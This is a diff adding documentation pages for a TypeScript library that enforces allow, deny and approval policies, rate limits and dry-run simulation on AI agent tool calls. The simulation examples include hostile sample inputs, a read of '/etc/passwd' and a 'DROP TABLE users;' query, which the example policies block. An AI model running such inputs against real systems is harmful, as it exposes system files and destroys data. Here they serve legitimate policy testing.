+ +## Advanced Examples + +### Role-Based Access Control + +Use `userAttributes` combined with a `condition` predicate to restrict tools based on the caller's role: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +const rules: PolicyRule[] = [ + { + id: "deny-admin-tools-for-non-admins", + description: "Block billing and admin tools for callers without the admin role.", + toolPatterns: ["billing.*", "admin.*"], + verdict: "deny", + priority: 50, + condition: (ctx) => { + const roles = ctx.userAttributes["roles"] as string[] | undefined; + return !roles?.includes("admin"); + }, + }, + { + id: "allow-admin-tools-for-admins", + description: "Admins may use billing and admin tools.", + toolPatterns: ["billing.*", "admin.*"], + verdict: "allow", + priority: 60, + condition: (ctx) => { + const roles = ctx.userAttributes["roles"] as string[] | undefined; + return roles?.includes("admin") ?? false; + }, + }, +]; + +const guard = createToolGuard({ + rules, + resolveUserAttributes: async () => { + return { roles: await getCurrentUserRoles() }; + }, +}); +``` + +### Time-Based Restrictions + +Async conditions let you query external data sources, including time-sensitive business logic: + +```ts +import type { PolicyRule } from "ai-tool-guard"; + +const businessHoursOnly: PolicyRule = { + id: "business-hours-only", + description: "Block payment tools outside of UTC 09:00–17:00.", + toolPatterns: ["payment.*", "charge*", "refund*"], + verdict: "deny", + priority: 80, + condition: async (_ctx) => { + const hour = new Date().getUTCHours(); + // Return true (condition met → rule fires) when outside business hours. 
+ return hour < 9 || hour >= 17; + }, +}; +``` + +### Conversation-Aware Escalation + +Rules can inspect the conversation context to tighten policy after repeated failures in a session: + +```ts +import type { PolicyRule } from "ai-tool-guard"; + +const escalateAfterFailures: PolicyRule = { + id: "escalate-on-repeated-failures", + description: "Require approval for any tool after 3 prior failures in a session.", + toolPatterns: ["*"], + verdict: "require-approval", + priority: 200, + condition: (ctx) => { + return (ctx.conversation?.priorFailures ?? 0) >= 3; + }, +}; +``` + +## How It Works + +The evaluation function `evaluatePolicy` (in `src/policy/engine.ts`) runs in this sequence: + +1. **Risk resolution** — The tool's `riskLevel` is taken from `ToolGuardConfig.riskLevel`, falling back to `GuardOptions.defaultRiskLevel`, then to `"low"` if neither is set. + +2. **External backend** — If `GuardOptions.backend` is configured, `backend.evaluate(ctx)` is called and its result seeds the initial `verdict`, `reason`, `matchedRules`, and `attributes` fields on the record. + +3. **Built-in rules** — The rules array is sorted by `priority` descending. Each rule is tested in turn: glob match against `toolName`, then risk level filter, then the optional async `condition` predicate. Every matching rule is collected. + +4. **Escalation merge** — The built-in rules result is compared to the backend result. If the rules verdict is stricter, it replaces the backend verdict. Matched rule IDs from both sources are merged into `DecisionRecord.matchedRules`. + +5. **DecisionRecord construction** — A complete record is assembled with a unique `id`, ISO-8601 `timestamp`, final `verdict`, human-readable `reason`, merged `attributes`, `evalDurationMs`, and `dryRun` flag. + +!!! warning "The default verdict is allow" + If no rule matches and no backend is configured, the verdict is `"allow"`. 
Deploy `defaultPolicy()` or an explicit catch-all deny rule to avoid unintentional permissiveness in production environments. + +## Related + +- [Preset Policies](preset-policies.md) — ready-made rule bundles for common scenarios. +- [External Backends](external-backends.md) — delegate decisions to OPA, Cedar, or a custom service. +- [API Reference](../api/policy.md) — full type documentation for `PolicyRule`, `PolicyContext`, and `DecisionRecord`. diff --git a/docs/guides/preset-policies.md b/docs/guides/preset-policies.md new file mode 100644 index 0000000..a958995 --- /dev/null +++ b/docs/guides/preset-policies.md @@ -0,0 +1,208 @@ +# Preset Policies + +`ai-tool-guard` ships two preset policy functions and three builder functions that cover the most common access control patterns. Presets produce a `PolicyRule[]` array compatible with the `rules` option of `createToolGuard()` and can be composed freely. + +## Overview + +| Function | Purpose | +|---|---| +| `defaultPolicy()` | Risk-tier-based allow/approve/deny baseline. | +| `readOnlyPolicy(patterns)` | Allow specific read tools; deny everything else. | +| `allow(opts)` | Builder: create an allow rule. | +| `deny(opts)` | Builder: create a deny rule. | +| `requireApproval(opts)` | Builder: create a require-approval rule. | + +## Basic Usage + +### `defaultPolicy()` + +Returns three rules that map each risk tier to a sensible default verdict: + +| Risk level | Verdict | +|---|---| +| `low` | `allow` | +| `medium` | `require-approval` | +| `high` | `deny` | +| `critical` | `deny` | + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => { + // Implement your approval channel here. + return { approved: true, approvedBy: "ops-team" }; + }, +}); +``` + +All three rules use `priority: 0` and `toolPatterns: ["*"]`, so they act as a global baseline. 
Higher-priority custom rules take precedence due to escalation semantics. + +### `readOnlyPolicy(readToolPatterns)` + +Allows the tools whose names match any of the supplied glob patterns and denies every other tool call. Useful for read-only agents that must never write or delete data. + +```ts +import { createToolGuard, readOnlyPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: readOnlyPolicy(["read*", "get*", "list*", "search*", "db.query"]), +}); +``` + +The function produces two rules: + +1. An `allow` rule at `priority: 10` matching the supplied patterns. +2. A `deny` rule at `priority: 0` matching `"*"` (catch-all). + +Because the allow rule has higher priority, matching tools pass through before the catch-all deny is reached. + +## Configuration Options + +### `SimpleRuleOptions` + +All three builder functions accept the same options object: + +| Property | Type | Required | Description | +|---|---|---|---| +| `tools` | `string \| string[]` | Yes | Tool name glob pattern(s). A single string is treated as a one-element array. | +| `riskLevels` | `RiskLevel[]` | No | Restrict the rule to specific risk tiers. | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise<boolean>` | No | Optional async predicate. | +| `description` | `string` | No | Human-readable description written to `DecisionRecord.reason`. | +| `priority` | `number` | No | Evaluation order. Higher values are evaluated first. Default `0`. | + +Each builder auto-generates a stable `id` with a prefix indicating the verdict (`allow-N`, `deny-N`, `require-approval-N`). + +## Advanced Examples + +### Admin vs. 
Viewer Policies + +Compose builders to produce role-specific policy bundles and select the right one at runtime: + +```ts +import { allow, deny, requireApproval } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +function adminPolicy(): PolicyRule[] { + return [ + allow({ + tools: "*", + riskLevels: ["low", "medium"], + description: "Admins may use low and medium risk tools freely.", + priority: 10, + }), + requireApproval({ + tools: "*", + riskLevels: ["high"], + description: "High-risk tools require a second admin to approve.", + priority: 10, + }), + deny({ + tools: "*", + riskLevels: ["critical"], + description: "Critical tools are blocked for everyone, including admins.", + priority: 20, + }), + ]; +} + +function viewerPolicy(): PolicyRule[] { + return [ + allow({ + tools: ["read*", "get*", "list*", "search*"], + description: "Viewers may use read-only tools.", + priority: 10, + }), + deny({ + tools: "*", + description: "All other tools are denied for viewers.", + priority: 0, + }), + ]; +} + +// Select the policy based on the current user's role. +const userRole = await resolveRole(); +const rules = userRole === "admin" ? adminPolicy() : viewerPolicy(); + +const guard = createToolGuard({ rules }); +``` + +### Environment-Specific Policies + +Different environments often need different guard postures. Use environment variables to select a policy bundle: + +```ts +import { defaultPolicy, allow, deny, requireApproval } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +function policyForEnvironment(env: string): PolicyRule[] { + if (env === "production") { + // Production: tight defaults, everything high-risk requires approval. 
+ return [ + ...defaultPolicy(), + requireApproval({ + tools: "*", + riskLevels: ["high"], + description: "High-risk tools always require approval in production.", + priority: 5, + }), + ]; + } + + if (env === "staging") { + // Staging: allow high-risk tools so QA can test them without approval friction. + return [ + allow({ tools: "*", riskLevels: ["low", "medium", "high"], priority: 5 }), + deny({ tools: "*", riskLevels: ["critical"], priority: 10 }), + ]; + } + + // Development: permit everything. + return [allow({ tools: "*", description: "Allow all tools in development.", priority: 0 })]; +} + +const guard = createToolGuard({ + rules: policyForEnvironment(process.env.NODE_ENV ?? "development"), +}); +``` + +### Extending `defaultPolicy()` + +Add custom rules on top of the baseline by spreading the preset and appending higher-priority overrides: + +```ts +import { defaultPolicy, deny, requireApproval } from "ai-tool-guard"; + +const rules = [ + // Override: always deny file-system tools, regardless of risk level. + deny({ + tools: ["fs.*", "*File", "*Directory"], + description: "Filesystem access is never permitted.", + priority: 100, + }), + // Override: payment tools always require approval, even if marked low-risk. + requireApproval({ + tools: "payment.*", + description: "Payment tools always require explicit approval.", + priority: 100, + }), + // Baseline for everything else. + ...defaultPolicy(), +]; +``` + +## How It Works + +The builder functions (`allow`, `deny`, `requireApproval`) are thin wrappers around the `PolicyRule` interface. Each call increments a module-level counter to generate a unique `id` with a readable prefix. The auto-generated ID is recorded in `DecisionRecord.matchedRules` so you can trace which builder call produced a given decision. + +`defaultPolicy()` and `readOnlyPolicy()` call these builders internally and return plain `PolicyRule[]` arrays — there is no special runtime type and no class hierarchy. 
This means the output can be spread, filtered, or sorted alongside rules you write by hand. + +!!! note "Priority gaps leave room for overrides" + The built-in presets use `priority: 0` (`defaultPolicy`) and `priority: 0` / `priority: 10` (`readOnlyPolicy`). This intentional gap means any rule you add at `priority: 5` or above will be evaluated before the preset catch-alls, giving you fine-grained override capability without having to replace the entire preset. + +## Related + +- [Policy Engine](policy-engine.md) — how rules are evaluated, matched, and escalated. +- [API Reference](../api/policy.md) — full type documentation for `PolicyRule` and builder signatures. diff --git a/docs/guides/rate-limiting.md b/docs/guides/rate-limiting.md new file mode 100644 index 0000000..a5db2c2 --- /dev/null +++ b/docs/guides/rate-limiting.md @@ -0,0 +1,271 @@ +# Rate Limiting + +Rate limiting and concurrency control protect your tools from runaway invocation loops, expensive API hammering, and resource exhaustion. ai-tool-guard provides a sliding-window rate limiter and a concurrency cap that can be configured globally with per-tool overrides. + +## Overview + +Rate limiting is handled by the `RateLimiter` class, which is instantiated internally by the guard engine. You configure limits declaratively through `GuardOptions` and `ToolGuardConfig`. The limiter tracks call timestamps and active concurrency counts per tool and enforces them on every `acquire` call. + +When a limit is exceeded, the behaviour depends on the configured strategy: either reject immediately or queue the call until a slot becomes available. + +## Basic Usage + +Set global defaults on `GuardOptions` and override per tool as needed: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [{ id: "allow-all", toolPatterns: ["*"], verdict: "allow" }], + + // Global defaults applied to every tool. 
+ defaultRateLimit: { + maxCalls: 60, + windowMs: 60_000, // 60 calls per minute. + strategy: "reject", + }, + defaultMaxConcurrency: 5, +}); + +// This tool gets its own tighter limits. +const wrappedExpensiveTool = guard.guardTool("llmSummarize", llmSummarizeTool, { + riskLevel: "medium", + rateLimit: { + maxCalls: 5, + windowMs: 60_000, // 5 calls per minute. + strategy: "queue", // Queue excess calls instead of rejecting. + }, + maxConcurrency: 2, +}); +``` + +## Configuration Options + +### `RateLimitConfig` + +| Field | Type | Default | Description | +|---|---|---|---| +| `maxCalls` | `number` | required | Maximum number of calls allowed within the window. | +| `windowMs` | `number` | required | Window size in milliseconds. | +| `strategy` | `"reject" \| "queue"` | `"reject"` | What to do when the limit is exceeded. | + +### Global Defaults via `GuardOptions` + +| Field | Type | Description | +|---|---|---| +| `defaultRateLimit` | `RateLimitConfig` | Applied to every tool that does not specify its own `rateLimit`. | +| `defaultMaxConcurrency` | `number` | Maximum concurrent executions for any tool without an explicit `maxConcurrency`. | + +### Per-Tool Overrides via `ToolGuardConfig` + +| Field | Type | Description | +|---|---|---| +| `rateLimit` | `RateLimitConfig` | Overrides `defaultRateLimit` for this specific tool. | +| `maxConcurrency` | `number` | Overrides `defaultMaxConcurrency` for this specific tool. | + +Per-tool configuration always takes precedence over global defaults. A tool with no rate limit configuration and no global defaults has no rate limiting applied. + +### Strategies + +**`"reject"`** — When the rate limit or concurrency cap is exceeded, `acquire` returns immediately with `allowed: false`. The guard engine throws a `ToolGuardError` with `code: "rate-limited"` and includes `retryAfterMs` when available (rate limit case only — not for concurrency rejections). The tool is never executed. 
+ +**`"queue"`** — When the rate limit or concurrency cap is exceeded, `acquire` suspends the current call until a slot opens. Calls are released in FIFO order via a per-tool queue. This provides backpressure rather than hard rejection. Use it when occasional latency is preferable to dropped calls. + +!!! warning "Queue strategy and timeouts" + Queued calls wait indefinitely for a slot. If you use the `"queue"` strategy, ensure your caller has an appropriate timeout so that a stalled queue does not block your application indefinitely. + +## `RateLimiter` Class + +The `RateLimiter` class is used internally by the guard engine. It is also exported for testing and custom integration scenarios. + +### `acquire(toolName, config, maxConcurrency?)` + +Attempt to claim a slot for the given tool: + +```typescript +import { RateLimiter } from "ai-tool-guard/guards"; + +const limiter = new RateLimiter(); + +const result = await limiter.acquire("my-tool", { + maxCalls: 10, + windowMs: 1000, + strategy: "reject", +}, /* maxConcurrency */ 3); + +if (!result.allowed) { + console.error(result.reason); + // result.retryAfterMs is set for rate limit violations (not concurrency). +} +``` + +`acquire` returns `RateLimitAcquireResult`: + +```typescript +interface RateLimitAcquireResult { + allowed: boolean; + reason?: string; // Human-readable explanation when not allowed. + retryAfterMs?: number; // Milliseconds until the oldest call leaves the window. +} +``` + +For the `"queue"` strategy, `acquire` does not return until a slot is available. The resolved `result.allowed` is always `true` in that case. + +### `release(toolName)` + +Release a concurrency slot after tool execution completes. The guard engine calls this in a `finally` block, guaranteeing cleanup even when the tool throws: + +```typescript +// Internal pattern — the guard engine does this automatically. 
+await limiter.acquire(toolName, config, maxConcurrency); +try { + result = await tool.execute(args); +} finally { + limiter.release(toolName); +} +``` + +Calling `release` also wakes the next queued caller (if any) for the `"queue"` strategy. + +### `getState(toolName)` + +Returns the current `RateLimitState` for a tool, useful for observability and debugging: + +```typescript +const state = limiter.getState("my-tool"); +// state.timestamps — array of call timestamps within the current window +// state.activeCalls — number of currently executing calls +``` + +### `reset()` + +Clears all state and rejects all queued callers with an error. Intended for use in tests between test cases: + +```typescript +limiter.reset(); +``` + +## Advanced Examples + +### Protecting an Expensive External API + +Cap calls to a third-party API that bills per request, and queue excess calls rather than dropping them: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard(); + +const wrappedOcrTool = guard.guardTool("ocrApi", ocrApiTool, { + riskLevel: "medium", + rateLimit: { + maxCalls: 100, + windowMs: 60_000, // 100 calls per minute matches API plan limit. + strategy: "queue", // Back-pressure excess calls. + }, + maxConcurrency: 10, // No more than 10 in-flight requests at once. +}); +``` + +With this configuration, calls beyond the 100/min window wait in the queue. As calls complete and their timestamps age out of the window, queued callers are admitted in order. + +### Preventing Runaway Tool Loops + +AI agents can enter feedback loops where a tool result causes the model to call the same tool repeatedly. 
A tight rate limit on high-risk tools breaks these loops before they cause damage: + +```typescript +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: [ + { + id: "require-approval-high", + toolPatterns: ["db.*"], + riskLevels: ["high", "critical"], + verdict: "require-approval", + }, + ], + defaultRateLimit: { + maxCalls: 20, + windowMs: 60_000, + strategy: "reject", + }, +}); + +const wrappedDelete = guard.guardTool("deleteRecord", deleteRecordTool, { + riskLevel: "critical", + riskCategories: ["data-delete"], + rateLimit: { + maxCalls: 3, + windowMs: 60_000, // Maximum 3 delete operations per minute. + strategy: "reject", + }, + maxConcurrency: 1, // Never run more than one delete at a time. +}); +``` + +When `strategy: "reject"` fires, the caller receives a `ToolGuardError`: + +```typescript +try { + await wrappedDelete.execute(args); +} catch (err) { + if (err instanceof ToolGuardError && err.code === "rate-limited") { + console.warn(`Rate limited: ${err.message}`); + } +} +``` + +### Observing Limiter State + +Use `getState` to expose rate limit metrics to your monitoring system: + +```typescript +import { RateLimiter } from "ai-tool-guard/guards"; + +// Access the internal limiter (if you hold a reference to it). +setInterval(() => { + const tools = ["db.query", "email.send", "payment.charge"]; + for (const tool of tools) { + const state = limiter.getState(tool); + if (state) { + metrics.gauge(`tools.${tool}.active_calls`, state.activeCalls); + metrics.gauge(`tools.${tool}.window_calls`, state.timestamps.length); + } + } +}, 5_000); +``` + +## How It Works + +### Sliding Window Algorithm + +The limiter uses a **sliding window** rather than a fixed window. On each `acquire` call: + +1. `Date.now()` is sampled as `now`. +2. The `timestamps` array for the tool is pruned: any timestamp where `now - timestamp >= windowMs` is removed. +3. If `timestamps.length >= maxCalls`, the rate limit has been hit. +4. 
Otherwise, `now` is appended to `timestamps` and the call is admitted. + +The sliding window avoids the burst-at-boundary problem of fixed windows. A call made at `t=59s` does not reset the counter at `t=60s`; its timestamp ages out of the window at `t=119s`. + +### Concurrency Checks + +Concurrency is tracked separately via `state.activeCalls`: + +1. After the rate limit check passes, `state.activeCalls` is compared to `maxConcurrency`. +2. If `activeCalls >= maxConcurrency`, the concurrency cap has been hit. +3. Otherwise, `activeCalls` is incremented and the call is admitted. +4. `release(toolName)` decrements `activeCalls` in the `finally` block of tool execution, guaranteeing the slot is always returned. + +Both checks happen within the same `acquire` loop, so a queued call re-evaluates both conditions when it wakes up. + +### Queue Mechanics + +When the strategy is `"queue"` and a limit is hit, `acquire` calls `enqueue(toolName)` which pushes a `{ resolve, reject }` pair onto a per-tool queue and returns a Promise. `acquire` then `await`s that Promise, suspending the caller. When `release(toolName)` is called, it shifts the first waiter off the queue and calls `resolve()`, waking the oldest queued caller. That caller re-enters the `acquire` loop and re-checks limits before being admitted. If `reset()` is called while callers are queued, all pending Promises are rejected. 
+ +## Related + +- [API Reference — Guards](../api/guards.md) +- [Error Handling](error-handling.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/simulation.md b/docs/guides/simulation.md new file mode 100644 index 0000000..e4088a2 --- /dev/null +++ b/docs/guides/simulation.md @@ -0,0 +1,236 @@ +# Simulation and Dry-Run + +## Overview + +ai-tool-guard provides two mechanisms for evaluating policies without executing real tools: + +- **Global dry-run mode** — configure a `ToolGuard` instance with `dryRun: true` to intercept all tool calls and return a safe placeholder instead of running the underlying `execute()` function. +- **Batch simulation** — use the standalone `simulate()` function to replay a recorded trace of tool calls through a policy configuration, producing a full `SimulationResult` with per-call decisions and summary statistics. + +These features are designed for policy testing before deployment, regression testing after policy changes, and analyzing audit traces to understand what would have been blocked. + +--- + +## Basic Usage + +### Global Dry-Run + +Set `dryRun: true` on `createToolGuard`. All tools wrapped by this guard will return `{ dryRun: true, toolName, args }` instead of executing. + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + dryRun: true, +}); + +const tools = guard.guardTools({ + deleteRecord: { tool: deleteRecordTool, riskLevel: 'critical' }, +}); + +// Safe to call — no deletion happens. +const result = await tools.deleteRecord.execute({ id: '123' }, execOptions); +// result => { dryRun: true, toolName: 'deleteRecord', args: { id: '123' } } +``` + +Policy evaluation still runs in dry-run mode. `DecisionRecord`s are produced and passed to `onDecision`, and OTel spans are emitted. The only thing skipped is the actual `execute()` call. 
+ +### Batch Simulation + +Use `simulate()` to evaluate a recorded trace against a policy without any live tool calls: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; +import type { RecordedToolCall } from 'ai-tool-guard/policy'; + +const trace: RecordedToolCall[] = [ + { toolName: 'readFile', args: { path: '/etc/passwd' } }, + { toolName: 'writeFile', args: { path: '/tmp/out.txt', content: 'hello' } }, + { toolName: 'deleteRecord', args: { id: '42' }, userAttributes: { role: 'admin' } }, +]; + +const result = await simulate(trace, { + rules: [ + { + id: 'block-sensitive-reads', + toolPatterns: ['readFile'], + verdict: 'deny', + condition: (ctx) => String(ctx.args.path).startsWith('/etc/'), + }, + ], +}); + +console.log(result.summary); +// { total: 3, allowed: 2, denied: 1, requireApproval: 0 } + +for (const { toolCall, decision } of result.blocked) { + console.log(`Blocked: ${toolCall.toolName} — ${decision.reason}`); +} +``` + +--- + +## `RecordedToolCall` + +A `RecordedToolCall` represents one entry in a simulation trace: + +```typescript +interface RecordedToolCall { + /** Name of the tool that was (or would be) called. */ + toolName: string; + /** Arguments the model supplied. */ + args: Record<string, unknown>; + /** Optional override for user attributes during simulation. */ + userAttributes?: Record<string, unknown>; +} +``` + +The `userAttributes` field lets you replay the same tool call under different identity contexts — for example, to verify that an admin role bypasses a restriction that blocks regular users. + +--- + +## `SimulationResult` + +`simulate()` returns a `SimulationResult`: + +```typescript +interface SimulationResult { + /** Full decision records for every tool call in the trace, in order. */ + decisions: DecisionRecord[]; + /** Aggregate counts. */ + summary: { + total: number; + allowed: number; + denied: number; + requireApproval: number; + }; + /** + * Tool calls that would not have been allowed outright. 
+ * Includes both "deny" and "require-approval" verdicts. + */ + blocked: Array<{ + toolCall: RecordedToolCall; + decision: DecisionRecord; + }>; +} +``` + +Every element in `decisions` corresponds to the `RecordedToolCall` at the same index in the input trace. The `blocked` array is a filtered view containing only the non-`allow` decisions, paired with their originating tool call for convenient reporting. + +--- + +## `simulate()` Function Signature + +```typescript +async function simulate( + trace: RecordedToolCall[], + options: GuardOptions, + toolConfigs?: Record<string, ToolGuardConfig>, +): Promise<SimulationResult> +``` + +| Parameter | Type | Description | +|---|---|---| +| `trace` | `RecordedToolCall[]` | Ordered list of tool calls to evaluate. | +| `options` | `GuardOptions` | Policy configuration: rules, backend, risk level defaults, etc. | +| `toolConfigs` | `Record<string, ToolGuardConfig>` | Optional per-tool risk level and category overrides, keyed by tool name. | + +All evaluations run with `dryRun: true` internally. The `options.dryRun` flag does not need to be set explicitly. + +!!! note + `simulate()` runs evaluations sequentially in trace order, not in parallel. This matches the serial execution model of a single-threaded agent and ensures that stateful policy rules (e.g., ones that accumulate failure counts) behave consistently. + +--- + +## Use Cases + +### Testing a Policy Before Deployment + +Write a simulation test that asserts expected verdicts for known tool call patterns: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; +import { productionPolicyOptions } from './policy-config.js'; + +const result = await simulate( + [ + { toolName: 'executeSQL', args: { query: 'DROP TABLE users;' } }, + { toolName: 'executeSQL', args: { query: 'SELECT * FROM orders WHERE id = 1;' } }, + ], + productionPolicyOptions, + { + executeSQL: { riskLevel: 'high', riskCategories: ['data-delete', 'data-read'] }, + }, +); + +// Assert the destructive query is blocked. 
+const [dropDecision, selectDecision] = result.decisions; +console.assert(dropDecision.verdict === 'deny'); +console.assert(selectDecision.verdict === 'allow'); +``` + +### Comparing Two Policy Configurations + +Run the same trace through two different policy configurations and compare their outputs: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; + +const [resultA, resultB] = await Promise.all([ + simulate(productionTrace, policyConfigV1), + simulate(productionTrace, policyConfigV2), +]); + +const v1Denials = resultA.summary.denied; +const v2Denials = resultB.summary.denied; + +console.log(`Policy V1 denied: ${v1Denials}`); +console.log(`Policy V2 denied: ${v2Denials}`); +console.log(`Delta: ${v2Denials - v1Denials} (${v2Denials > v1Denials ? 'stricter' : 'more permissive'})`); +``` + +### Audit Analysis + +Replay a recorded production trace to understand which calls would have been blocked by a new policy: + +```typescript +import { simulate } from 'ai-tool-guard/policy'; +import type { RecordedToolCall } from 'ai-tool-guard/policy'; + +// Load trace from audit log (e.g., written by onDecision callback). +const auditLog = JSON.parse(fs.readFileSync('audit.json', 'utf-8')); +const trace: RecordedToolCall[] = auditLog.map((entry: any) => ({ + toolName: entry.toolName, + args: entry.args, + userAttributes: entry.attributes, +})); + +const result = await simulate(trace, newPolicyOptions); + +console.log(`Replayed ${result.summary.total} calls.`); +console.log(`New policy would have blocked ${result.blocked.length} of them.`); + +for (const { toolCall, decision } of result.blocked) { + console.log(` ${toolCall.toolName}: ${decision.reason}`); +} +``` + +--- + +## How It Works + +1. `simulate()` iterates over the trace array sequentially. +2. For each `RecordedToolCall`, it constructs a `PolicyContext` with `dryRun: true` and the call's `userAttributes` (defaulting to `{}`). +3. 
It calls the internal `evaluatePolicy()` function with the context, the `GuardOptions`, and any per-tool config from `toolConfigs`. +4. The resulting `DecisionRecord` is collected. If the verdict is not `allow`, the call is also added to the `blocked` array. +5. After processing all calls, the summary counts are computed from the collected `decisions` array. + +No approval handlers, rate limiters, injection detectors, or output filters run during simulation. Only the policy engine is invoked. + +--- + +## Related + +- [Policy Engine](policy-engine.md) +- [API Reference — Policy](../api/policy.md) diff --git a/docs/index.md b/docs/index.md new file mode 100644 index 0000000..22886b5 --- /dev/null +++ b/docs/index.md @@ -0,0 +1,134 @@ +# ai-tool-guard + +**Policy enforcement middleware for Vercel AI SDK tool calls.** + +Intercept, validate, approve, and audit every tool invocation your AI agents make — before they execute. + +```sh +npm install ai-tool-guard +``` + +--- + +## Why ai-tool-guard? + +- **Prevent dangerous AI tool calls.** Define declarative policies that block, require approval, or silently allow tool invocations based on arguments, caller context, or external signals — before any side effect occurs. +- **Human-in-the-loop approval.** Route sensitive operations to a human reviewer (or a secondary AI) and resume execution only when explicitly approved, with support for approve-with-edits so reviewers can correct arguments mid-flight. +- **Comprehensive audit trail.** Every decision — allow, block, approve, edit — is recorded as a structured `DecisionRecord` with full argument snapshots, policy match details, timestamps, and optional OpenTelemetry spans. +- **Zero-config sensible defaults.** Drop `guardTool` around any existing Vercel AI SDK tool and get injection detection, basic argument validation, and decision logging with no additional configuration required. 
+ +--- + +## Features + +| Feature | Description | +|---|---| +| **Policy engine** | Declarative allow/deny/require-approval rules evaluated per tool call | +| **External backends** | Plug in HTTP, database, or custom `PolicyBackend` implementations | +| **Decision records** | Structured audit log of every policy decision with full context | +| **Dry-run / simulation** | Evaluate policies without executing tools, for testing and previewing | +| **Conversation-aware policies** | Policies can inspect conversation history and accumulated context | +| **Approve with edits** | Human reviewers can modify tool arguments before approving execution | +| **Approval correlation** | Track approval requests and responses across async boundaries | +| **Argument guards** | Schema-level and semantic validation of tool input arguments | +| **Injection detection** | Detect prompt injection attempts embedded in tool arguments | +| **Output filtering** | Scrub or redact sensitive data from tool return values | +| **Rate limiting** | Per-tool and per-session call-rate limits with configurable windows | +| **OpenTelemetry** | First-class OTel span and attribute instrumentation throughout the pipeline | +| **MCP drift detection** | Detect when MCP server tool schemas diverge from expected definitions | + +--- + +## Architecture + +The execution pipeline wraps each tool call in a series of composable stages: + +``` + ┌─────────────────────────────────────────────────────────────────┐ + │ createToolGuard │ + │ (configuration & backends) │ + └──────────────────────────────┬──────────────────────────────────┘ + │ + ┌────────────────▼────────────────┐ + │ guardTool / guardTools │ + │ (wraps Vercel AI SDK tools) │ + └────────────────┬────────────────┘ + │ + ┌────────────────▼────────────────┐ + │ Pipeline │ + │ │ + │ 1. Injection detection │◄── OTel span + │ 2. Argument validation │◄── OTel span + │ 3. 
Policy evaluation │◄── PolicyBackend + │ ├─ allow │ + │ ├─ deny ───────────────────► │ DecisionRecord + │ └─ require-approval ───────► │ ApprovalRequest + │ 4. Approval flow │◄── OTel span + │ └─ approve / edit / deny │ + │ 5. Rate limit check │◄── OTel span + │ 6. Tool execution │◄── OTel span + │ 7. Output filtering │◄── OTel span + └────────────────┬────────────────┘ + │ + ┌───────────▼───────────┐ + │ Tool result │ + │ + DecisionRecord │ + └───────────────────────┘ +``` + +Every stage emits an OpenTelemetry span. Policy decisions at stage 3 are dispatched to the configured `PolicyBackend`, which can be an in-process rule set, an external HTTP service, or a custom implementation. + +--- + +## Quick Navigation + +
+ +- **Getting Started** + + Install the library, wrap your first tool, and run a guarded agent in under five minutes. + + [Getting Started](getting-started/installation.md) + +- **Guides** + + Deep dives into policies, approval flows, audit trails, rate limiting, and OTel integration. + + [Guides](guides/policy-engine.md) + +- **API Reference** + + Full TypeScript API documentation for `createToolGuard`, `guardTool`, `PolicyBackend`, and all types. + + [API Reference](api/index.md) + +- **Examples** + + Runnable example projects covering common use cases and integration patterns. + + [Examples](examples/nextjs-integration.md) + +
+ +--- + +## Installation + +```sh +npm install ai-tool-guard +``` + +!!! note "Peer dependencies" + `ai-tool-guard` requires the [Vercel AI SDK](https://sdk.vercel.ai/) (`ai`) as a peer dependency. Install it alongside if you have not already: + + ```sh + npm install ai-tool-guard ai + ``` + + TypeScript 5.0 or later is recommended. The package ships with full type declarations and targets ESM (`"type": "module"`). + +--- + +## License + +MIT. Copyright (c) Francis Eytan Dortort. See [LICENSE](https://github.com/dortort/ai-tool-guard/blob/main/LICENSE) for details. diff --git a/docs/requirements.txt b/docs/requirements.txt new file mode 100644 index 0000000..d14bca3 --- /dev/null +++ b/docs/requirements.txt @@ -0,0 +1 @@ +mkdocs-material>=9.5,<10 diff --git a/mkdocs.yml b/mkdocs.yml new file mode 100644 index 0000000..0513396 --- /dev/null +++ b/mkdocs.yml @@ -0,0 +1,91 @@ +site_name: ai-tool-guard +site_url: https://ai-tool-guard.readthedocs.io +site_description: Policy enforcement middleware for Vercel AI SDK tool calls +site_author: Francis Eytan Dortort +repo_url: https://github.com/dortort/ai-tool-guard +repo_name: dortort/ai-tool-guard +edit_uri: edit/main/docs/ + +theme: + name: material + palette: + - scheme: default + primary: indigo + accent: indigo + toggle: + icon: material/brightness-7 + name: Switch to dark mode + - scheme: slate + primary: indigo + accent: indigo + toggle: + icon: material/brightness-4 + name: Switch to light mode + features: + - navigation.sections + - navigation.expand + - navigation.tabs + - navigation.top + - content.code.copy + - content.code.annotate + - search.highlight + - search.suggest + - toc.follow + icon: + repo: fontawesome/brands/github + +markdown_extensions: + - admonition + - pymdownx.details + - pymdownx.superfences + - pymdownx.highlight: + anchor_linenums: true + line_spans: __span + pygments_lang_class: true + - pymdownx.inlinehilite + - pymdownx.tabbed: + alternate_style: true + - pymdownx.snippets + - 
